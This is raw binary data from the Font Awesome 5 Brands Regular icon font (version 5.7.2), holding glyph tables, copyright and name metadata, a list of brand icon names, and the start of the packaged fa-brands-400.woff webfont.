��"�"��%.8-�-8.8�Α��N�����r""+R	;;

;;	RR;;
 
;;	4-8 
%.8p.%-88-%L""���2Js{���3&=4'&'&">7#&#6726&'676&'676727""'&'.232.#"'.#"&'5>326="264&2"&46"2642327367632&#"'5.'"&'6�
&
	

O

	
&)=!(&?
:(!1	&(:
?&(!=""7,�

* *

�xP5[=
y!')

)&@@L""
3


++
����r%>7#./.>?.>?677'7'=57&'>&'>&'>4'�

#,F**E-"

	
&

		"????,

	J	(
&#+!''!

'5,* 5)#		0[>060+
!<-'D$0		7..��.7		0 U*1P-1-713D#
&'544J������Rk���&76567<'45&'&45&567>767>&#0.'&7654'&'&'&676567>75'./564'5'.54'&'"'.?'&'&'&76767632654'45&5&'&'&'&'&'.'&/5'7>32674&'&762626?32?#""367>76767>7676#"7&54'&54'&5476.'&54'&4367&'.66'&'67&�	

	

				I	X
D)!
I&�+%&#%@
	
		
9	'					


	
		

	&-
 	$	

9,:L�8'', %%	�������^^��K2322230##"'"'*&#&#&'&'&'&'&'&'&'&'4&54&45&547<65<656167>567676767672636212":372676767676767676767676'4&1&'&'&'&'&'"#'&67"#"'&'&'&'&#4.5&'&'&7676767"'041465<5<5<5456767676767654'&'&'&'0&673676745<5<5<645<5<5<5454512174767676763632367676?0'&'&'&'3"#"'&'.'&'676767'&'&'&'&'.'2303232763667676767464567<5<545<54'&'&'&'&'"'47676767610#4&'<'"#*#"#"#41>12676345"'.#4&#41:3670254>721633230"""02220#*#"#"14=46123#"'&'&'&'&'&'&'.50'&'67<7676%0#&'"/476767676767676367676747654'&�


(+		
5
+


+	
	
	
(!		
'/
u

		
	�	

	f
	
	


 "
		

	&

		
�			
	t
		





�	'		
2#

,A
&


-<

	
#			2



	



	
	
	



	

:
$�%	
	


	

		
		

	
&&,


 

	

	

���ag62&276767676765&'7>767677676'.5676'&'&'&'5>6767`J[+,(!B.
%$6 $+.1!,
"1  	(M;�7< 3	
	�93-!"


	

!'$"
-*6$#/62.=4.I##%>,14_0
����!)1'62777''''777&47'6"264&2"&4w[

[wF;FF;Fw[[wF;FF;�gHIfI�H44H4�F;FF;Fw[[wF;FF;Fw[

[HgIIf%4H44H
����+5?IS[iq��2"&4264&"%#3##5#'353#535##3353'7'7'7''7'7'7'7'7'7'7'7'&2"&4#535##3353'"353&2654'#3##5#'?'7'7'�Α�Α�Š�Š��TT0v%��IS���|S�	
�		
x켅���BT�Ɲ(u4T_Fp��?��}1�TT@s,	�
��Α����Š�¿#/��.R\8P��]		


�
R	������!3R2���RARA�U}XM<3?��8 XF	���������������''.'4.'6'777''4&467&7467>'.'.67'77'??'?67.673'''''776'7.'5'7'677&'67'677&'6'4&''&'47'67&'6�			''
	
Y:k, !,l:Y
		
&
E
	(		!
'�	,
	' 
((&""!#	%
% "!=2b']<&1xx1&<]'b2=!"

%
%	#!""&((
 n,>'
L
�'J
'? 
�����?^�7.676.>?3:1>'.0#&7'&>'7>.'.#"56&6762&'&5./>7>54=3K


H-u$=,#[
'16
/	
	
	G+pH
�
%[(3N
>-#		\	
)3}	F,wG

� ?.$		['21
��

	H,m������!FJNUf���������'#".637<54&'&767&0"1##'&'&7636#'0&7/7'&76'&#&76743272#"./"'.7'&>6320%367#>?/"1>7>367'&26'6'.1#&#"767>0'&'&'1&23&32236&#4'"#*2>132#"'2>71#&'&6723676&+&'&'&'&/&'&#"&#"&'#77767>517463#&'&#"76746&&�p


	_
p,
�
 .9%	3BB'


	�n
	&!#""	\ -V
K#E

	
"(	

9D$
	K,	
	
	)3�?9(	w�	
�	�	<


	0HJE
3	

.
6.#(F4H�"'�


�

&5			




n 
����
'?'2"&45'5'5'757757�"!!"EΑ�Α�;<<;!""!�""B!!�Α���W;X<KK<X;WA!!AA!!A��d�#+62#"&44>2"&72"&5>264&"�
j
OIii�h-PnMMnN�


�g�ggJO�!#��MmMMm����!$"&462#.5467552654&'7'6&&6��SuoPmm<S\�\'!.H�6&&6'=�xSQv&??(Z=A\\A)F<����2#"&4632#&#"7'&'.=&76322�BRg��g_Gdz7%"Ab@	&HI1�Α?QJ 4!!
�;6	
	!=�����'=O?62"'764&""&46"'&4622?6"&4?622?62&4?62"'&"��R:w)�)���R)��R:w)�)���R)�i�:Rw�(�x��_:Rw�(�p������"29@KQ6/.=4>7*#35326&'>.#*#3533'2+5'2+57"32>.2"&��

��
j s
 )
		
B

�)**�

j�	k

k	�	[d$#c"d!!R &!' ###.S2#"'#"'.4&54632>32>654.#"#'&"#'&#"32?3327�&1
	C==C	
3%-	$
.8
,-
:
-,A !'(
" ~/$
 N+F66E7"# -##s��  ��
�%"uu"%?�B:Uq0467>23>'.'.'&"+'67>27'#5<>7>7>7'&'&#'7'6767>�

r B	B #)�
�S$*+	
	SS#+,
	<	#�=11>��mm�	��
S{
=

>	{|	?

?	����2"&46&'&"&'.26�Α�Α�
ARA

PfP��Α�Ό'33'
1??������F".4>226'&#4&<74#"#"#6=276&#"1332325&53"��,��,&%
P%PS&�&mm&�&m�b$VB%/g$u`-0'��$�+"/+"54;276;2"Cn33�E�6�l��Ά	�����"2#!"&54635#'#3577#5##R��$=>=>>>=�\>==���.���MM�xMMxlii����
#'#'#735737537#75'3#�_lVb(m{Wa�CH�U4N��4POI 6SPߌHH@�\?��q?�2��35���'�;er�5�F���=�f5+�Q
GT`�3#'#75#37'2#7''67#6;65#>7>3732#%'67>''>+#"'&'236=#"&/35"'&'26?#036�z1*aIZ=6@B4X3��	
)�
z



l

�&)
t,+<o,���^	!A"	1L3
'#(	 !
:LI
Gd	e����5>2.'>?#535#5##3#3&#"3267#!"&5463&632#"z)d
Xmm3nn\�
Q.:-.0-MKa ��))#-"K7?C�)�$	-

33/#/-$"6 )4)��! I������b��i����&IZy%'#"'&545'&7461/>36767'767'36.76736'>6762#'&3&476726#&5&#&'&#7"/67676'&7676'657#&'/7'70*#67654'&'&'&#"'#&?#7"&#572366767'"'?67"'"'&#"#7?7>.'#&''.#'".'&'65.''&'67.'''0>7'2&/?&+57''#776.'&'.'77#6'.22277'7''7'3''76767/'#7/67&7'&676'.67'&'&6327'52&#5#63'64767>76.7307>'&6?#&3'&'&7&'676�
	=f<\BA(	
!	.4

%	

		o
 	
'
��



	 		

	
	
' 

	99
$1@'&-�		
*

	/ 6,


		I,-
-0 		,%+�
	
7'F

	


	(	 	
	�=b5<=Z-#		'
-

		
�
	


	
	 
	 !*	



	
		$&
��



<


)
�
!
$,,			

+/
 0	H




v	%03
21				C
	

����Z�v�!"76743765&54'&'3#6743627>7>4646'4&#*#.'&3!#"#23#5232'0&'&132'7>7261&'.'+3R��r)"s

7 S0,


t
d�		

	'	
k
IH
	
D-<	
	�)

  	e	��������`��&G�).#&'&504547>7'&'2>162323256'3'"#"'&'&#"2*&43:65654'&"#&7225<720323&'27215"5&'430>7&'&'&'#"#>272'&'4&'"0133'&6765674#"#"'67625656'&54632'6:3"5'.7>321&'&6*#'>5454'"572325454'"47032#32#*#*.'&*32%&+0#&76'&'4#*620#"#"72767676327454'"7032#3276"'67236"54&#&#"7636'&&36762#"#"47256'1"54'&767456'.7620#"3>76"#"#"&3656'4'"43:'32#"#"763265454'"#&6360#7>7+�"0'&1&7474+2'3676&'&"&56576&'"326&3645.&'��	gi�
�	�		0�
		0


?|5'#Z
�<
.$*';?



!	�%$
+.e
	+	g!"	

$%�(
�%76-Wj
U��{p�:<{�tc
�

R#

C1\C=�#
dhQ=KBemz

H1					
!

		"R%&


)/('E	3n
q:��g
	
& �$&
�e
Z�&"'[r~�����'<JX_l����%".5&&7'46?67632766''7&5&'46&'.<.523036'74'6'67&672>30?2&&&2#"'75'654%'4>2&16&#"&'6'3&74'&7&'&'&7276&5&633#65#6'&67"'6&261&>&'707&#&#'5063632*#75'35'32'22>=4.#":>5#54.*#3#75'3#372#".>26&"'#75'37'3'&'320637+676=40:>4."&3#.'#75'35'#6'254.*#&63&674'&':	$	'
	
	�!;//��
	
*��
	
		89e<QI4%�
#J*,-*I!
#�',')r		�
	
	
31NL! d	

l	 	<	M<N			B&&U	'"O	U,0	L	'*i
		����	#5>6+53%2#!"&546354&+32675#"735#535#57#'#r(��n0/e?		>5  �&! &�	F	h���h��G�j	}&&s�rr����!GKO'36767&'&7>672&1&'&67.'.'1'&'6	37'���7:
 
)"AJ�D!		
!&	5=*���������9

&	&K|D!	%	6
	�����	�x2K^66'6%'#"&/45467'&54>67676>7>.#0#"77''77''77'?�(�
Wbo�o	w
QV�RO9
�
X2$s0�mC=J!q:	.>/.18'8
,-2$3
		�
$!
,s,-
-�,~,'�}%Wah���*=U`����W\by���76&654&'&#6'76"10'4?#&'2#4'5654'&'654&#"#./>6'&7'7'>15.'675&'#&'56767.#5675".'565'#34>307&'.'&7"2#04/5"267&'4.17676767#'4.56461##&563&'5#6376535"'&'474656'.#672<15&7507&7>7#7.767.7&#76&'&&561"&'2157>7202'3>17&67>7&'&75."&7#76'&7627&'24767?.3'45'3654&5473.#&7'7'"'0#&7''''7''&'.?'>0327'7'067''&/67'7"'76%63''>'2#54.#"#&'56#"7>'&76567"&�

\9+aWYc.:�	3o�I9E|,r6CIo*
		8

7	
	&



	+		
.

	
&HL%CA"	
;_
(
!$$*"

=
%[UCB-K+�m	�AnI3,MsB<27

@		 f		D(P
G,��sR	


)	1G9Si	2&��
�G�		 
	
	

-					
P7y


Y%
\*
				/B%=A=+
$	*


;

!^+
XF	D;7%+P		'/#b	(&|2=;
(P@(�
7


���
%'73#��� ��8 �E�� �v'a�����_j�k]�����>�	2Nem����������	Ngx����"?'373'7'373'2#"=432+"54"2545<632+"=4;2+32+'+"/#+"=4;2'54+327+"/#+"?6;23'+"=#"=4;2+2+"=432+32+'2+"=4354"2'+"/#+"=4;2'2=4+72++"=454#323'7'3?#"&'&'>7&'.7.5467&76326&'."&'>%167676.#"6'&'67'32767>.'&'&'67&'.'&&'67&#&'67273&'277672767&'6753'2+"=4;22=433'7'373'7'3?2+"=4;2+32+73'7'3�:aNO	U�J.



`




��--=8 "b2-(*+"

(A7 "a3.'
)(I3��)+.0.X&$0-0-XT$ (;6( 	
4:9:&"6:+	m�6
(
$<;		;;*265??((4$$?	!
?3�00/[+GG	?@	N>2[+GG	>A'Q;�

#>@�6'T
#>A�'!	+--		_4422U?d����
3#'#"��ޫ�lIN���������L���
5!!"'%32#7;;�� �)��X=�tGgf G��������7+"&?>762+"'.>�2	�	}b�	�		'		�6�;���J*H3G<I����E%&'&#4>54676&/76/?6/????i
_
ji
0
4
+&(7
:
g`
#q
]
C

 <�PHx
>

<
Z����#+37;CGKOW_573'7#'5#'73?5#'735%53#'%'#57'#'7'57#7'537'#5'53'357'#573"Lv -#78-�88�ZL B8�

���P [Z ZZd- M�!L�NZZ  L/-�!mj87,z P!Z^ Ll  lv88���-88-
L-8--N ZZ/NZZ ��MG-LeN ZZZ-Li l/-�88��* NZ�����#F767>'&'./&"&'&'.?>>7076($<?W0732

'"4!
j
($<?W1193

3):"	
j$.r
BF.
r
	A
���+/48<@HO?3%3#73+732%#73#576+732#"7>533613373'3#73'3#7333#"&7�;��VR�D#d)3
F>(>�M[�pu-	�N�;�ZIIM	R�:'�(:8�^
�75<
7N55������-7"1"&464.'">125061622>101"&�XVWAG HIgEE�SVY]x=~f� .. f0y?}Z� 48?KR^%#'#5##"&'#73&547##53#3>>32353#3733.26&#"5#535#535#737'#3'7#'#3J6@�"V#*
@511m<732	
�8w>�/&�!
�8878_18228�(.-&(..&�="!%#
M�)L1+E 3,"�(.99,"4233������#)/5;AHMS���������2+"&=6&/'&6'&57'67'67'67'67'&5547'&/67'726&+"=46>54&'&#"#";2#"&#"36=367'67'67'67'67'67''6767'����]��77��	#5"1$.'.4178+;@H�

"+		

,>*

!!
.OB		$	6#0$.(26)@���� �\
8!6-�	$#$(6
8 -\@I
-	/	=,8/!


>38$#$(5*
A��V�##"&463"&463"&46;2"2"&4U2G22##22##22#� 
2FF22F2�#22G22F22G2 $22F22F����'/AI2#!"&54632=4"2=4"2=4"2=4">.""'&"6754"2�!!��!!�KKJC
0�2
:�<�!��!!P!R������-���
))
0�������N2#!"&54634&32>27'#&5676.7#3547#36737676�����&	"	D
 
!M	 ".-	���nr

�45&($O�$] g$
����%?&'&47677'�I��M�&��LLL�J��M�&�|LLL��
�sCR%.'&76'&'&756'&'.676>'&6332>7262654&+"3q#1+-1(''(1+,1)$
55)"55��"%%
{;
0,A@ -/";,-20-VV-02(%%������lt|�� *6>KWcm%+"'&'.'&'.6?4>7&'&'&7&7&7&7&66366632362636730764622>6626'6.>.677&'>7&'67"'67&'67'67'467'67"#"57&&7&461&7&7&5&&2656&'>7&'>&'&'&'&'&'0&'&#'''#&7676'&6&'.&>.26'4&&754&"266&'&67>&'&t
%$$
%

	
			
	
%+/:%.$
)=D			

	

$"$�D=)	
	


	7#1.+p	
g

!	-%%.%.~&%(I#1"#1"R
	&
#
	�
%2$		$2%
 		
	
	





	
	
	
# "%'^/+
/*
!#
	
	l


"!
	
	
&$(%�% )$l*'
�
+.
+�			
~  -*.
Y
$)
'���n���%'&&7676722&5&367>767>5465&#"&#"#.#"#.'&&'&'&'.#"+&546&'&7676'.'&"&'&"#&'&7&6'2&/.7622676#"'0416'&"4368	�Ԗ)+"




 	
�""(

	6

$	
J$
#0X2Q��				E 	/s�jK@


		

'*jd!	&!
&-

1/!�	
(
����
7#%'3?3#/?/OZ���{�[
�=Q
[�XZ����$�f+j������	�BX	���vq&0����S������%+"&=.5462>54&"�N>	`	>Nw�w��()+3+�BkffkBTwwT## %%��ybjt��7&'367#".#.#"#.'&676&'&32>36#"&'47>'&'&'&767>6&'"7#".4>24"�[&
"0
74
	1	.
;66


$	0!3	J$D33?I=.$
&
Y

<	

 

.5	E&	-			0($#>05#/

����)1>J2"&4$>.2654.#"7&47'>.767''7>?&'&'&6�Α�Α3
�	
%
+''+
�
%%.R+/2.%%2/+R��Α��?

�
		
		2(^(2+�

E$4//)e4$)0��x�';FSk753&=36'>.5!5&>'>'#7>54.46&'56'4.c!#!_J�[
!,*f'\TY%1,*"'-� $/!!
	O;
#7$�{�fh
�',�		�+"~("�&#2#E`				 
`3H%'&74>&#&'4>76;27232#>7%!!$7>&'."#.'&�/�
%:'Y447^E'�7H1���D�Y�

Q�H�
5

,�
	]
��������QY�%'&>?&/'&7'.67&7.76767>30767"12676326"&462.#6'676&'&&'&"&"7327676767>�$0

/

		\�Α��B 	
%
/"	g	
5!	

		'�Α�Α��

/ -
	"1

	V6��#k%�1
,�Gm��!	4	:Q	�	F�	:/	J�	4�	
XL	.�	*	]	:u	*�	Copyright (c) Font AwesomeCopyright (c) Font AwesomeFont Awesome 5 Brands RegularFont Awesome 5 Brands RegularRegularRegularFont Awesome 5 Brands Regular-5.7.2Font Awesome 5 Brands Regular-5.7.2Font Awesome 5 Brands RegularFont Awesome 5 Brands Regular329.474 (Font Awesome version: 5.7.2)329.474 (Font Awesome version: 5.7.2)FontAwesome5Brands-RegularFontAwesome5Brands-RegularThe web's most popular icon set and toolkit.The web's most popular icon set and toolkit.https://fontawesome.comhttps://fontawesome.comFont Awesome 5 BrandsFont Awesome 5 BrandsRegularRegularFont Awesome 5 Brands RegularFont Awesome 5 Brands RegularFont Awesome 5 BrandsFont Awesome 5 BrandsRegularRegular���	

� !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~������������������������������twitter-squarefacebook-squarelinkedin
github-squaretwitterfacebookgithub	pinterestpinterest-squaregoogle-plus-square
google-plus-glinkedin-in
github-altmaxcdnhtml5css3btcyoutubexingxing-squaredropboxstack-overflow	instagramflickradn	bitbuckettumblr
tumblr-squarewindowsandroidlinuxdribbbleskype
foursquaretrellogratipayvkweiborenren	pagelinesstack-exchangevimeo-squareslack	wordpressopenidyahoogooglereddit
reddit-squarestumbleupon-circlestumbleupon	deliciousdigg
pied-piper-pppied-piper-altdrupaljoomlabehancebehance-squaresteamsteam-squarespotify
deviantart
soundcloudvinecodepenjsfiddlerebelempire
git-squaregithacker-news
tencent-weiboqqweixin
slidesharetwitchyelppaypal
google-walletcc-visa
cc-mastercardcc-discovercc-amex	cc-paypal	cc-stripelastfm
lastfm-squareioxhost	angellist
buyselladsconnectdevelopdashcubeforumbeeleanpubsellsyshirtsinbulksimplybuiltskyatlaspinterest-pwhatsappviacoinmediumy-combinator
optin-monsteropencartexpeditedsslcc-jcbcc-diners-clubcreative-commonsgg	gg-circletripadvisor
odnoklassnikiodnoklassniki-square
get-pocketwikipedia-wsafarichromefirefoxoperainternet-explorercontao500pxamazonhouzzvimeo-v	black-tie	fonticonsreddit-alienedgecodiepiemodxfort-awesomeusbproduct-huntmixcloudscribd	bluetoothbluetooth-bgitlab
wpbeginnerwpformsenviraglideglide-gviadeo
viadeo-squaresnapchatsnapchat-ghostsnapchat-square
pied-piperfirst-orderyoast	themeislegoogle-plusfont-awesomelinodequorafree-code-camptelegrambandcampgravetsyimdbravelrysellcastsuperpowers
wpexplorermeetupfont-awesome-altaccessible-iconaccusoftadversalaffiliatethemealgoliaamilia
angrycreative	app-store
app-store-iosapper
asymmetrikaudibleavianexaws	bimobjectbitcoinbity
blackberryblogger	blogger-bburomobelexperte
centercode
cloudscale
cloudsmithcloudversifycpanelcss3-alt
cuttlefishd-and-d	deploydogdeskpro
digital-oceandiscord	discoursedochubdocker
draft2digitaldribbble-squaredyalog
earlybirdserlang
facebook-ffacebook-messenger
firstdraftfonticons-fifort-awesome-altfreebsd	gitkrakengofore	goodreadsgoodreads-ggoogle-drivegoogle-playgripfiregruntgulphacker-news-square
hire-a-helperhotjarhubspotitunesitunes-notejenkinsjogetjs	js-squarekeycdnkickstarter
kickstarter-klaravellinelyftmagentomedappsmedium-mmedrt	microsoftmixmizunimoneronapsternode-jsnpmns8nutritionixpage4palfedpatreon	periscopephabricatorphoenix-frameworkplaystationpushedpython	red-riverwpressrreplyd	resolving
rocketchatrockrmsschlixsearchenginservicestacksistrix
slack-hashspeakap
staylinkedsteam-symbolsticker-mulestudiovinarisuppletelegram-planeuberuikituniregistryuntappdussunnahvaadinvibervimeovnvwhatsapp-squarewhmcswordpress-simplexboxyandexyandex-international	apple-paycc-apple-payflynintendo-switchnodeosireactautoprefixersassvuejsangularaviatoemberfont-awesome-flaggitterhoolistravastripestripe-stypo3
amazon-pay
cc-amazon-payethereumkorvue	elementoryoutube-square	flipboardhipsphp	quinscapereadmejavapied-piper-hatcreative-commons-bycreative-commons-nccreative-commons-nc-eucreative-commons-nc-jpcreative-commons-ndcreative-commons-pdcreative-commons-pd-altcreative-commons-remixcreative-commons-sacreative-commons-samplingcreative-commons-sampling-pluscreative-commons-sharecreative-commons-zeroebaykeybasemastodon	r-projectresearchgate	teamspeakfirst-order-altfulcrumgalactic-republicgalactic-senate
jedi-ordermandalorianold-republicphoenix-squadronsithtrade-federationwolf-pack-battalionhornbill	mailchimpmegaportnimblrrevshopwaresquarespacethemecoweeblywixello
hackerrankkagglemarkdownneoszhihualipaythe-red-yetiacquisitions-incorporated
critical-roled-and-d-beyonddevfantasy-flight-gamespenny-arcadewizards-of-the-coastthink-peaksreacteuropeadobe
artstation	atlassiancanadian-maple-leafcentos
confluencedhldiasporafedexfedorafigmaintercominvisionjiramendeleyraspberry-piredhatsketch
sourcetreesuseubuntuupsuspsyarn����`)l؈��؈��PK!�X˖TJTJ'fontawesome/webfonts/fa-brands-400.woffnu&1i�wOFFJT
�XIyXFFTM0�qqGDEFL*�OS/2lO`B�/cmap��j��gasp���glyf�0��$��p�head5�36��hhea5� $5�hmtx6���}loca8�DD�.<maxp;� 
Oname<�uu"post>$.���x�c```d�	�9`�c�U(}G/��x�c`a|�8�����ч1����Je�dha``b`ef�FHsMah���1���0�4ՀZ1.R
��kZx���mh�e��]�}=�<��:��M�u�����?(�:��n�a�$��=��X����RQ��<�9_� �e6����s_��KZW���O}�/�������q�t���r"v;�Y�ER=}�q"hK��~���_���V�NC)���\*�Ŵ��P1��
������j��S#]�{�4����=8��q>��3x>�"^�%�)o�W�~�㣜�k|�o�4Y&��HJ��B��v��o䐜�SrZ�H�4I�ܔ6�/�D�t	 x-��ら�����9�<�/�r�KW�j}H��uR7����a<���w��aC�����1�M�YeJM��`6��9h�&i.�+�����8~q�#�_��e=>������
*�e)���c7��	j�&�K��4~��39�z���c&/�q��ͼ���^>`=Ns3_Oy̑BY+[��d�$d�|-URg=~��4X��֣U~���C[�� #Ȳ��h�j�z�����X���l3���x���?=�%����@|���
�}�~�5X�{�+0�[�K܌�X�����������p<�\�}�;v�,��.�t�
��<��pn@��`"�c�m
oA>�y0F�p��ȅa�~����
�@/xz�K�'�_cALb��y���)�E]P��YuJիT��Q�j�*QEj����U�wۻ���x�^�7��ey�^��"n����q����e���t�ݓO���+���3�H�]i�?����A��t��x���	�%Gy&�����}˻�v��nY[WuWU�[Rw���[K/�EkABhan��@ !y�#��`���ƌ�x�=�1�����g~f>�T�?��ju7�y�[u�FFfF����!`A8�
z	='X² �n8>�����{�0���q�F�
���#�*��k���]E�>z�/����z���z�r�(�)�f)2mZ�3
�$��N���?p�_����؈t�U�ݖ�.E2��%��*-����:7��;��$�W�2�Q�x܈j7D/��+�^b��ܞݵ�?���k��)�PV�����gF
�*�\�?�P?�G^o��߬Q����,���.wK���s���g���p*QT	�njW3Q���v��F��܄�}���ǨE��z0S+Z�Y��ْ�[��P7傺]-�n���(<$<�3jɇ��
���:��l͵�=�J�IG�f2�h؍Vq�0�M�
�&m������m�Vs��MF��5l�o؄
y�ϼ����립{O�vu��c�"Әl+Nˮ��lE��"�S>ѲT�=��Q�D��X$XT��BE�EL���bJ�>�\�l�>��\�`Ud�EU<���.ZÒY
C��bE�f*�n�L	+�9���HB�(b*!HaD��49HR�73�E���X@O	sp���hV$�f���P5�s��I�"O,�P��.��rͼ|)��b��ffg���w�]S�r���J���2���,��(#Q*Me��*����S�U�6bT���S�oIِ,>?ZsKK��LSCO�zl�>��
>?v��Tw������!���f�m��ƒ@��B��t��
�舶�.�^��D!5X�l� EN>�B��`��dĈ25[4�jQ	�Q	wא�K!�P�~��Λ��D���ǯ
c)�}�l��RV�0S�L�Ԛ����$��Xzd��l`�jPQ���3S$�τ�!E>p��X�#/*��"5L�*	QD��z(#�f�:���ͣ��b��5�řa��e�rC4dEQ�f��r�Zh�@yzH��hBq���!}Qg�y�m??~�
�W��"|Q"+�#�+`d|Κ�k�twx��OVQ��R!�Ud��b�[(��D�{���E?|�L3�P�V���k���2>%����u��z��Z����Y�R��y�[�����vvY��۳k����*R�D�jS{���b�U�yU��Z�(�h�?�ɿ�Й�/��:��"^��?�A�'A{p���K�?�Ԣ��T�fϕi�hڨ��R�.4Jcټ%�F2$h5\��b�Q��u��&w�f������Quj��t�_ȹZ�WJ�,��
0� �+z��#^�ǧ��g�n>�-���m�Ix�ac�%
�ν������~Q,䜂S�e�|�5����"�\�-{8-�5���\��喷����tA���B^h	B��?�ȴ�0���
��H�Q�̠7衇��l����W��N%�\6�Jw�{�d�{�u�{����-V��}��[�����K��8���N��_�
}<�#���
^E\���>���T�+��i�ΞY�N�@j�R��45Q����1�����\u$��}�@�T�'�	�pD��)�D��+��n�ë�+X�82Zk�ȱ$.��*nBe)T�E����h�U��$S(X��L� ����g'g'���%�v�k�t0L��W�lf�Js��[cϋ�Ǜu?�yu�\��"����N��e�Q�Uŷ�Q6�1���H��l30󧮮7�f*�	D�[F1N��)$�^�V�}�h��+7-]�ie=�Zo�?��ߡ�o���%���Y�U"��TE�BI�,`�q��P�Bg�9�?������[�M�=��@�,��WM�y �����%�}AaI�Ek���?�����o������j۟u����abz����P�x�%��KG��G���`@��8=$�^o�A��d��@�A�l	���EP�P�
Wi���� ����Ƽr�*2�Б%��J�7����t�*�����Ez�M�i�W�+���`�lnll.!$�l3�G�C��U��n�^:v#�#�j*��Ab��<�(������9�Z���9�Jb����<��P&���6KHJZ�)ZҤ���9=��ɖ
"��S7��{�?���qIUNL99�_��F��n��J�l��s�G��Br}�'�5�<�ܣ�B�3�Vq�s]&�{���N����@~>uR���N��	��S鿿MW�����<?��?�_W.�a�g�C�-��-#�Խ'g��Px=@�9�)Y��I�Q���T8�2�5x]�gAX�_�_Q���B��B�K��9�Mp����P7�	�bm+q��
�7�s$?r�8~���~��c_�?
��
z;�'�%ZPf�����/<����
_+�#�8���[�/:�����7~��`�=��V����'��x.������oz�7�zK��{^F��XB��.Ap�l*+/�����Mi�}�n��%����
<��I��c&���K�1D%��zK���n�ظq�������Z�m����7v���6y�ZM�6f�c"�e9��8+�u�E�`�4�[i6�m��:�K�5^�5LK��D�R��V�5��6���
�R�|����R��l�"ڋ��OӞ;>���.4�����%$��47�ߡ�V� yA�>�~��zI/�ɞ�����z��o�<�L�����z~�����~?���G?�1
��P�J"i�Z���	�Y���Z@D����	��TQ=��z	*n�`",1��EG�/��e|u	��O�;@��k�P�h�,/��F4�@���B4���Ւ1�j�mY���T�X\U��CR1�Bg:zJ�ԉ�ް��-��|�C��nu��^�����&�u�]�v��6���P�/#��z݋L&"|�}J�tZAd�ђ�5󓗌�3���b�p�­����l��0w��o���
?�q�S>%����qT�S!Zޥ/U̎��j�|Q6�v�*���J���+~n��<�\�W8�Z�P[J�4�v��Q�;������DH�K_�ts�/��g��
��T�}����ՅeaS8,�|<��}�q3/�l8@V<� �WE�I
#>���h���4;�y�'��ꚣ���B��/�������kP�?��� �X��T��Ho��0Q�m���G�=�۶��f۟���ug�k��]�G�l�[4�y[�d�D�bl
|�1�R8]f��"�TA9���2�_��ۅ��O_G*�@0�V��Ї�ڀ��������q"�G�*h���P�H�Hy$x3M�6��9:u����R��O�pl{%�ȃgk�F��Hӄk��xjTN�S��<��5q���u���n���p�o��Cfo�u�ל�7y���%�L�B=G%���q��큲���|�_���bH{��u�fF]�0G�9���"g�\���)rh�σ6�7�T�0/[���$�a��a��ZS>P�lU�QŐ�^5��y@'|Y�2�SJ�!E�T�8gR��Ja�	EzH���NM�v�d���n�ж��ꪌ��(Q��L�����$[��DD���B%�����3.R��I�d(��IȈzYC��"j	�֦��`�5�TҢ��T�s�7R�u��:4�m��i�h/�%1yץ�%�[��R�Y�H@��6��(Z �2�n@q"��L��+4�J��^�0�`��x��˕-j�
�ىliB��{��MoE�e�5�,Pmu�%��۟���R��(I@#�K=f&��C�@.�-غ�[�g�>���j��J�RdZ�eQ��<)�+��3���k��N���H�0�J�V��`i��b�����X�ʈ�r>'���Ij[r@�����WqK��&�a�0$Vq�g$M�C:�o�0 a�h��S񉞥�R�(�_���n�M�k��祹*�����'�p����g��@Ϩ���k{��K�$.��f��j_�g��
�����*��y��Ji���n���aF��Wv�'|��r�e��y��y=�Ź�H�Lm�����>�I�psp�|��dO�L�� x�'��N����DΧ~of㤤9�#M�YOc:�6��#*��dղ��F�s���־gJ��zD�t<�ΧX`R&��v$Ec�r{BsMU�LdH5E�Lx��o�m�"z}p�Z*�-d�c���q$�p���f�.����U����Q��&�c�}���,д��)�:�h�s�BV�	E%��)RID_�T�Q�m&��`�,B�u�W0M�ۿ��ke��8l0MW"K�X��b���LuA�9o����F?���<�8H���0e��|zwT�r�Q�=akG5[�_��# ���C5�~�F�z�U�s䚶
W�>�>�$O�i�c�j�Uj�V10rn��n"\O��.QB�Uu�����1��� �5�4�i*�Z��S������F� �p��Gs\'��uđ5cl��*@�kuQjJ܅8a�c]�Y��8�Uq��(5�гD�_f�w}�������_�4첩�0#���=׫+
s�3�
k��І�L���D�C�iVmU����s���nT�kL_Q	�$|�q����x���>!���U�
�p
2�0�:�v��XKj.�xM��ôK�Y�!�L�LFωios�WB��A���f�	F�K4�j��6{��_9��+�"�%k�r$�:wo��v�>*�ao�xӦ
�\��&��TJ�a��*�[ԐRɏt$TR��n��ˋuU4���]��e���/΃����G{�n�z��91���`K�`��M��9Y�!"+��ʾB��rd�_?/(�u����&^�G.4鈻��wk}ix�����̚���$?W��k߀��G+{O�c���
G:�#�ҵVo��ć��O��!�y���,�"�����>7��*�ӵ��r��p��	�'�f�_%��gA0��!:ku�gL�|Ӣ��)z��i��4������"W�~@�fђ��	,@"����*MN�&3D��Lk��*����#�Lˠj�i�:D���o�B��k����Ü19��
��79�-�HF�'D�4��Л>
z�.؂�{5��Ț
82�ՠ1��nXDU�]�l3�]�B���ݾ=�'�ܾ�� ,�N�hg�����k°оD?�,-�aJѩP��"�Rd4�n�F���zƪ���gly��"�sW�	�f��XG��5$R�ЮL�^S�b�1rԳ�P͚�c[c�Ш�2�@Q����W
�p�P��.��t���F��"b��q��i�'�6_8o���!�#v�%���i|}�Y(x��|�Ph�g�<$f=�z�W0�.���~���K�?�"��y�+�T��+�0���r� �7&K��Z)S��������F�y-�쨖Jt`G\}l�q���w�2���z�p�f�22Rj�P����ك�qH����]YA�oBq�T�qnin���
�w����}��Q��w�3�35���0r8U|�}��L�"ˮ��>�����l�ts��u]� >��x���!��S)J,5�'A����IZ��a� {��>��=����w6J�خ�[�#ꔲPo.1t��}����)�쁜
`>}
�S�'�ZPL��2|	O�%��d�V�T���Y9�,���Y�g�G����d���I�ƫ���~�o��x�6��_���n
xA<��G�:���gnڻQ��`rbw���'/�n�={�Z�`wϩ(�YW�0�;t X*8.CN՜�w�<Q�5[I42$A�ZM��,B�
